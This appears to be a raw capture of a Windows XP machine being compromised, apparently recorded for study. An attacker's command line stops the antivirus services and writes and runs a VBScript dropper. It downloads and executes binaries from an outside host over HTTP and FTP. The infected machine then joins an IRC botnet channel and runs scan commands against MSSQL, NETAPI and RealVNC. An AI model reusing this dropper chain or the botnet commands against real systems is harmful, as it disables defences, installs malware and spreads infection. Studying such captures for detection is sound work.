VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.
VICTIM: C:\\WINDOWS\\system32>
ATTACKER: net stop \Norton AntiVirus Auto Protect Service\&net stop Mcshield&net stop \Panda Antivirus\&echo dim HTTPGET>c:\\1.vbs&echo dim Data>>c:\\1.vbs&echo dim ExeURL>>c:\\1.vbs&echo dim LocalPath>>c:\\1.vbs&echo.>>c:\\1.vbs&echo ExeURL = \http:/58.236.112.187:23369/84785_msvcpr.exe\>>c:\\1.vbs&echo LocalPath = \c:\\prsc32.exe\>>c:\\1.vbs&echo.>>c:\\1.vbs&echo Set HTTPGET = CreateObject(\Microsoft\ ^& chr(46) ^& \XMLHTTP\)>>c:\\1.vbs&echo Set Data = CreateObject(\ADODB\ ^& chr(46) ^& \Stream\)>>c:\\1.vbs&echo.>>c:\\1.vbs&echo HTTPGET.Open \GET\, ExeURL, false>>c:\\1.vbs&echo HTTPGET.Send>>c:\\1.vbs&echo.>>c:\\1.vbs&echo Const adTypeBinary = ^1>>c:\\1.vbs&echo Const adSaveCreateOverWrite = ^2>>c:\\1.vbs&echo.>>c:\\1.vbs&echo Data.Type = adTypeBinary>>c:\\1.vbs&echo Data.Open>>c:\\1.vbs&echo Data.Write HTTPGET.ResponseBody>>c:\\1.vbs&echo Data.SaveToFile LocalPath, adSaveCreateOverWrite>>c:\\1.vbs&cscript /Nologo /B c:\\1.vbs&del c:\\1.vbs&start c:\\prsc32.exe&echo OPEN 58.236.112.187 20152>x&echo GET 27031_msvcpr.exe>>x&echo QUIT>>x&FTP -n -s:x&27031_msvcpr.exe&del x&exit
VICTIM: GET /84785_msvcpr.exe HTTP/1.0
VICTIM: Accept: */*
VICTIM: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
VICTIM: Host: 58.236.112.187:23369
VICTIM: Connection: Keep-Alive
VICTIM: PORT 192,168,1,1,4,11
ATTACKER: RETR 27031_msvcpr.exe
VICTIM: NICK [0]USA|XP-SP0[P]578765
ATTACKER: :Vancouver.BC.CA.Undernet.org NOTICE AUTH :*** Looking up your hostname...
VICTIM: USER Gangsta \localhost\ \ice.novi-pazar.biz\ :Shit
ATTACKER: :Vancouver.BC.CA.Undernet.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
ATTACKER: :Vancouver.BC.CA.Undernet.org 001 [0]USA|XP-SP0[P]578765 :Welcome to the ROXnet IRC Network [0]USA|XP-SP0[P]578765!Gangsta@192.168.1.1
ATTACKER: :Vancouver.BC.CA.Undernet.org 002 [0]USA|XP-SP0[P]578765 :Your host is Vancouver.BC.CA.Undernet.org, running version Unreal3.2-RC2fix
ATTACKER: :Vancouver.BC.CA.Undernet.org 003 [0]USA|XP-SP0[P]578765 :This server was created Thu Jan 10 2008 at 04:01:05 CST
ATTACKER: :Vancouver.BC.CA.Undernet.org 004 [0]USA|XP-SP0[P]578765 Vancouver.BC.CA.Undernet.org Unreal3.2-RC2fix iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT
ATTACKER: :Vancouver.BC.CA.Undernet.org 005 [0]USA|XP-SP0[P]578765 MAP KNOCK SAFELIST HCN MAXCHANNELS=10 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server
ATTACKER: :Vancouver.BC.CA.Undernet.org 005 [0]USA|XP-SP0[P]578765 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beqa,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
ATTACKER: :Vancouver.BC.CA.Undernet.org 422 [0]USA|XP-SP0[P]578765 :MOTD File is missing
ATTACKER: :[0]USA|XP-SP0[P]578765 MODE [0]USA|XP-SP0[P]578765 :+iw
VICTIM: JOIN #pest#
VICTIM: JOIN #pest#
VICTIM: JOIN #pest#
ATTACKER: :[0]USA|XP-SP0[P]578765!Gangsta@192.168.1.1 JOIN :#pest#
ATTACKER: :Vancouver.BC.CA.Undernet.org 332 [0]USA|XP-SP0[P]578765 #pest# :scan -m -n -v -r
ATTACKER: :Vancouver.BC.CA.Undernet.org 333 [0]USA|XP-SP0[P]578765 #pest# i 1215680721
ATTACKER: :Vancouver.BC.CA.Undernet.org 353 [0]USA|XP-SP0[P]578765 @ #pest# :[0]USA|XP-SP0[P]578765 @dk
ATTACKER: :Vancouver.BC.CA.Undernet.org 366 [0]USA|XP-SP0[P]578765 #pest# :End of /NAMES list.
VICTIM: PRIVMSG #pest# :{SCAN}: Scanning (#MSSQL#NETAPI#REALVNC#) 10.2.*.*
ATTACKER: :Vancouver.BC.CA.Undernet.org 404 [0]USA|XP-SP0[P]578765 #pest# :You must have a registered nick (+r) to talk on this channel (#pest#)
VICTIM: QUIT
ATTACKER: :dk!dR@dR.com PRIVMSG #pest# :scan 83.117.x -m -n -v -r
VICTIM: PRIVMSG #pest# :{SCAN}: Scanning (#MSSQL#NETAPI#REALVNC#) 83.117.*.*
ATTACKER: :Vancouver.BC.CA.Undernet.org 404 [0]USA|XP-SP0[P]578765 #pest# :You must have a registered nick (+r) to talk on this channel (#pest#)